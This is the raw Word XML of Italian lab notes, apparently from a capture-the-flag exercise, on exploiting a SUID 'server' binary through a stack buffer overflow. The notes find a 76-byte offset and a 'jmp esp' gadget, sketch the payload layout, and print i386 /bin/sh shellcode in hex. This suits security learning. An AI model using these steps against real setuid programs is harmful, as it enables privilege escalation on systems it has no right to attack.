    <w:p w14:paraId="2C8C08FC" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>655: 110 | 101 | 101 --&gt; rw-r-xr-x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134163BF" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:t>U (proprietario) legge e scrive ma non esegue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9C52B4" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>G (gruppo) legge ed esegue ma non scrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1DA5B2" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>O (altri) legge ed esegue ma non scrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326A837E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B434CD8" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>L'impostazione del bit SUID su un eseguibile fa sì che, quando eseguito, il programma venga eseguito con i permessi del proprietario del file (in questo caso, root), piuttosto che con i permessi dell'utente che lo ha eseguito. Questo è un meccanismo che può essere sfruttato per un'escalation dei privilegi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE7CCAB" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="0C7B610F" w14:textId="6C911010" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>Con queste impostazioni non dovremmo riuscire a leggere il contenuto di flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74472475" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ file server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E9C8E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ checksec server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1389FB28" w14:textId="77777777" w:rsidR="008B240B" w:rsidRDefault="008B240B" w:rsidP="0070510D"/>
    <w:p w14:paraId="3427C189" w14:textId="77777777" w:rsidR="008B240B" w:rsidRDefault="008B240B" w:rsidP="0070510D"/>
    <w:p w14:paraId="64301121" w14:textId="77777777" w:rsidR="008B240B" w:rsidRDefault="008B240B" w:rsidP="008B240B">
      <w:r>
        <w:t>Visto che servono i permessi per tutto faremo questo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230E0125" w14:textId="77777777" w:rsidR="008B240B" w:rsidRPr="008B240B" w:rsidRDefault="008B240B" w:rsidP="008B240B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo chown </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>my_user</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>my_user</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4EC054" w14:textId="77777777" w:rsidR="008B240B" w:rsidRPr="008B240B" w:rsidRDefault="008B240B" w:rsidP="008B240B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B240B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo chmod 600 flag.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47355931" w14:textId="77777777" w:rsidR="008B240B" w:rsidRPr="008B240B" w:rsidRDefault="008B240B" w:rsidP="008B240B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B240B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo chown </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>my_user</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>my_user</w:t>
      </w:r>
      <w:r w:rsidRPr="008B240B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AB7E3F" w14:textId="77777777" w:rsidR="008B240B" w:rsidRPr="008B240B" w:rsidRDefault="008B240B" w:rsidP="008B240B">
      <w:r w:rsidRPr="008B240B">
        <w:t xml:space="preserve">$ sudo chmod 4755 server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3383D932" w14:textId="6C7603E2" w:rsidR="008B240B" w:rsidRPr="0070510D" w:rsidRDefault="008B240B" w:rsidP="0070510D">
      <w:r w:rsidRPr="008B240B">
        <w:t>Essenzialmente dopo essermi impostato proprietario di tutti I fi</w:t>
      </w:r>
      <w:r>
        <w:t>le mi do tutti i permesi sul server per non avere problemi durante l’esecuzione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD8DDC3" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ ghidra --&gt; per poter aprire "server" su ghidra ho dovuto eseguire:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643C2982" w14:textId="14221FEA" w:rsidR="005D4A9F" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ sudo chown my_user:my_user server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3469E445" w14:textId="1C637196" w:rsidR="0070510D" w:rsidRPr="00AF5671" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="00AF5671">
        <w:t>$ gdb server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E84E15" w14:textId="69A047C3" w:rsidR="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ cyclic 100 --&gt; come faccio ad essere s</w:t>
      </w:r>
      <w:r>
        <w:t>icuro che bastano 100??</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B0C4E6" w14:textId="77777777" w:rsidR="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22954873" wp14:editId="21DD146F">
            <wp:extent cx="6120130" cy="2813685"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1358347328" name="Immagine 1" descr="Immagine che contiene testo, software, numero,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47328" name="Immagine 1" descr="Immagine che contiene testo, software, numero, Icona del computer&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2813685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75750156" w14:textId="4E9DB86E" w:rsidR="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A615C5">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Estratto dalla comparazione con Ghidra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9A556D" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="5DC62586" w14:textId="244289E0" w:rsidR="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r>
        <w:t>Essendo un totale di 76 100 bastano eccomme!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702C338C" w14:textId="02F5F71A" w:rsidR="001849B8" w:rsidRPr="001849B8" w:rsidRDefault="001849B8" w:rsidP="001849B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="001849B8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cyclic -l taaa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E1338E" w14:textId="3E67B426" w:rsidR="008B240B" w:rsidRDefault="001849B8" w:rsidP="001849B8">
      <w:pPr>
        <w:ind w:left="708" w:hanging="708"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001849B8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Finding cyclic pattern of 4 bytes: b'taaa' (hex: 0x74616161)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001849B8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Found at offset 7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="008B240B" w:rsidRPr="001849B8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5150DCB4" w14:textId="2F67158C" w:rsidR="001849B8" w:rsidRPr="00AF5671" w:rsidRDefault="001849B8" w:rsidP="001849B8">
      <w:pPr>
        <w:ind w:left="708" w:hanging="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF5671">
        <w:t>----&gt; SHELL 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3D3B7B" w14:textId="010E76D2" w:rsidR="001849B8" w:rsidRPr="00AF5671" w:rsidRDefault="001849B8" w:rsidP="001849B8">
      <w:pPr>
        <w:ind w:left="708" w:hanging="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF5671">
        <w:t>Come sarà fatto l’offset??</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48183256" w14:textId="6D87FE0F" w:rsidR="001849B8" w:rsidRDefault="001849B8" w:rsidP="001849B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pyhton2 -c ‘print “A” * 76 + “B” * 4 + “C” * 100‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>A -&gt; padding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>B -&gt; address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>C -&gt; shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBDA4C3" w14:textId="4C9030D1" w:rsidR="001849B8" w:rsidRDefault="001849B8" w:rsidP="001849B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001849B8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B2DF207" wp14:editId="40908B7B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-629285</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>281940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7158990" cy="944880"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1877743606"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43606" name="Immagine 1" descr="Immagine che contiene schermata,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158990" cy="944880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0EFF69" w14:textId="2B5660A9" w:rsidR="001849B8" w:rsidRDefault="001849B8" w:rsidP="001849B8">
      <w:r w:rsidRPr="001849B8">
        <w:t>Come si nota dall’immagine il g</w:t>
      </w:r>
      <w:r>
        <w:t>adget che vogliamo usare è quel:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFA97FE" w14:textId="7167D915" w:rsidR="001849B8" w:rsidRDefault="001849B8" w:rsidP="001849B8">
      <w:r>
        <w:t>0804919f  ff  e4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>JMP</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FEBDD2" w14:textId="74860BF7" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="001849B8">
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5586052E" wp14:editId="174B4921">
            <wp:extent cx="6120130" cy="1812290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11173144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4414" name="Immagine 1" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1812290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D5DF97" w14:textId="2564609B" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="001849B8">
      <w:r>
        <w:t>Eseguendo il gadget faremo una jmp verso uaaa… quindi li andrà messo l’indirizzo allo shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6711DBC7" w14:textId="36503019" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="001849B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ ropper --file server --search “jmp e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sp”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0224DC" w14:textId="00A630B6" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="122F0532" wp14:editId="6CF01580">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-720090</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>415925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7559675" cy="2324100"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="167622321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23211" name="Immagine 1" descr="Immagine che contiene testo, schermata, softwa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559675" cy="2324100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="009D6CE9">
        <w:t>&gt;&gt; 0x0804919f: jmp esp; --&gt; ma se i</w:t>
      </w:r>
      <w:r>
        <w:t>nvece di farlo manualmente vogliamo usare una libreria che contiene già vari shellcode utilizzabili possiamo usare “shellcraft”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE23694" w14:textId="396F5F42" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AEAE0FA" w14:textId="056940D3" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Quello che ci interessa è -l.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FB64FF" w14:textId="77777777" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C0DDBD4" w14:textId="0B7459C1" w:rsidR="009D6CE9" w:rsidRPr="00AF5671" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ shellcraft -l </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFE1B85" w14:textId="3C79A7C6" w:rsidR="009D6CE9" w:rsidRPr="00AF5671" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>… … … … … … …</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>i386.linux.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>… … … … … … …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2A49C5" w14:textId="2EC5FF5E" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="009D6CE9">
        <w:lastRenderedPageBreak/>
        <w:t>$ shellcraft i386.linux.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16459E1A" w14:textId="2293DBB2" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a0b58cd80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0693B0AA" w14:textId="099236FB" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Traduciamo il risultato direttamente in assembly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F546564" w14:textId="1B1339F5" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ shellcraft i386.linux.sh -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355B55ED" w14:textId="60A683A5" w:rsidR="009D6CE9" w:rsidRPr="00C21978" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00C21978">
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidR="004214B5" w:rsidRPr="00C21978">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004214B5" w:rsidRPr="004214B5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CCFD87C" wp14:editId="7DCA98A8">
            <wp:extent cx="3788838" cy="3032760"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="131041345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3453" name="Immagine 1" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente"/>
